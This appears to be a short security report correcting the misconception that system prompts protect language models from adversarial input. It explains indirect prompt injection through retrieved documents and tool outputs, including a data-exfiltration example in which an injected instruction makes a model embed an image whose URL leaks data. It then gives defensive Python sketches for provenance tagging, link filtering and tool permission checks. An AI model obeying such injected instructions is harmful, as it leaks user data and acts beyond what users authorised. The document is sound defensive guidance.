Report #97582
[counterintuitive] System prompts or developer instructions keep the model safe from adversarial user input
Treat prompt injection as an unsolved risk. Apply defense in depth: separate trusted from untrusted content, filter model output, reduce the privileges available to the model, and never rely solely on a system prompt for security.
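A minimal sketch of two of these layers, assuming a chat-style pipeline where the application assembles messages itself. The names `Message`, `build_messages`, `filter_output` and `ALLOWED_LINK_DOMAINS` (and the domain `docs.example.com`) are hypothetical and not any particular framework's API. Provenance is tracked in code, with only application-authored text marked trusted, and the output filter is enforced in code regardless of what the model was told. The delimiter tags around untrusted text may help the model somewhat but are not a security boundary on their own.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Hypothetical allowlist of domains the application is willing to render links to.
ALLOWED_LINK_DOMAINS = {"docs.example.com"}


@dataclass(frozen=True)
class Message:
    role: str      # "system", "user", or "tool"
    content: str
    trusted: bool  # True only for text the application itself authored; set by code, never by the model


def build_messages(system_prompt: str, user_request: str, retrieved_doc: str) -> list[Message]:
    """Keep provenance explicit: user input and retrieved text are both untrusted."""
    return [
        Message("system", system_prompt, trusted=True),
        Message("user", user_request, trusted=False),
        # Delimiting external text is a hint to the model, NOT an enforcement mechanism.
        Message("tool", f"<untrusted_document>\n{retrieved_doc}\n</untrusted_document>", trusted=False),
    ]


# Rough URL matcher; stops at whitespace, ')' and angle brackets (e.g. Markdown link syntax).
URL_PATTERN = re.compile(r"https?://[^\s)<>]+")


def filter_output(model_output: str) -> str:
    """Replace links to non-allowlisted hosts, a common data-exfiltration channel."""
    def replace(match: re.Match) -> str:
        host = urlparse(match.group(0)).hostname or ""
        return match.group(0) if host in ALLOWED_LINK_DOMAINS else "[link removed]"

    return URL_PATTERN.sub(replace, model_output)
```

For example, `filter_output("See https://docs.example.com/a and ![x](https://evil.example.net/?q=secret)")` keeps the first link and replaces the second, so an injected instruction to "embed this image" cannot leak data through the rendered URL. A real deployment would need a more thorough filter; the point is that the check runs outside the model.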
Journey Context:
A common misconception is that system prompts are authoritative and always override user prompts. Research on instruction hierarchy and indirect prompt injection shows otherwise: models often give system instructions no reliable precedence and will follow instructions from the user turn, or from injected content such as retrieved documents and tool outputs, instead. Instruction tuning contributes to this, because it trains models to follow instructions wherever they appear in the context. No known prompt formulation reliably prevents a determined injection against a general-purpose LLM. Security must therefore be enforced outside the model, through architecture, not inside it through wording.
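One way to enforce this architecturally is a permission check in ordinary code between the model and its tools. The sketch below assumes the application derives each session's capabilities from the authenticated user before any untrusted text is processed; `Session`, `ToolCall`, `authorize`, `PolicyViolation` and the tool names are hypothetical. Because nothing in the prompt or the model's output can modify the session, an injected instruction can at most *request* an action; it cannot grant itself one.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ToolCall:
    name: str
    args: dict


@dataclass(frozen=True)
class Session:
    # Fixed by application code from the user's real permissions, before the model runs.
    allowed_tools: frozenset[str]
    # Tools with irreversible or outbound effects additionally require human confirmation.
    needs_confirmation: frozenset[str] = frozenset()


class PolicyViolation(Exception):
    pass


def authorize(session: Session, call: ToolCall, confirmed: bool = False) -> ToolCall:
    """Decide in code, not in the prompt, whether a model-proposed call may run."""
    if call.name not in session.allowed_tools:
        raise PolicyViolation(f"tool {call.name!r} not permitted for this session")
    if call.name in session.needs_confirmation and not confirmed:
        raise PolicyViolation(f"tool {call.name!r} requires user confirmation")
    return call
```

Usage: with `Session(allowed_tools=frozenset({"search_docs", "send_email"}), needs_confirmation=frozenset({"send_email"}))`, a `search_docs` call passes, a `delete_repo` call is rejected no matter how persuasive the injected text was, and `send_email` runs only after the user confirms. Keeping the allowed set small is the privilege-reduction layer: even a fully hijacked model can only do what the session already permits.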
Lifecycle
2026-06-25T05:22:01.881259+00:00— report_created — created